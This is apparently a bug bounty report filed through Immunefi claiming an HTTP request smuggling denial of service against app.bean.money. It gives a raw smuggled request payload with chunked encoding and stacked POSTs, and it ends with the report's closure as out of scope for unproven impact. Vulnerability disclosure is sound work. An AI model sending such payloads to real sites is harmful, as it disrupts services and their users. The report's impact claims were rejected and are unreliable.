Taking down the application/website requiring manual restoration
Description
HTTP request smuggling is a technique for interfering with the way a web site processes sequences of HTTP requests that are received from one or more users. Request smuggling vulnerabilities are often critical in nature, allowing an attacker to bypass security controls, gain unauthorized access to sensitive data, and directly compromise other application users.
Vulnerability Details
Offer a detailed explanation of the vulnerability itself. Do not leave out any relevant information. Code snippets should be supplied whenever helpful, as long as they don’t overcrowd the report with unnecessary details. This section should make it obvious that you understand exactly what you’re talking about, and more importantly, it should be clear by this point that the vulnerability does exist.
Smuggled Request Sample
POST / HTTP/1.1
Host: app.bean.money
Accept: */*
Connection: keep-alive
Transfer-Encoding: chunked
0
POST / HTTP/1.1
Host: app.bean.money
POST / HTTP/1.1
Host: app.bean.money
POST / HTTP/1.1
Host: app.bean.money
POST / HTTP/1.1
Host: app.bean.money
Impact Details
Normally, the processing time for each user's request is approximately 120 milliseconds. However, after injecting the smuggled requests, the server is forced to respond to all the requests as a single request. This significantly increases the load on the server, causing the processing time to spike to 3000 milliseconds. (Additionally, it is possible to retest to apply more pressure on the web server and induce further delay.)
Unfortunately, after reviewing your report, Immunefi has decided to close it due to the assessed impact being out of scope.
Immunefi review:
The claimed impact by the whitehat is in scope of the bug bounty program but the assessed impact doesn't match with the claimed impact for the following reasons.
Whitehat has not provided enough information on how HTTP Request Smuggling can cause the disruption of the entire application for regular users.
The assessed asset IS in scope for the bug bounty program
Please note that the project will receive a report of the closed submission and may choose to re-open it, but they are not obligated to do so.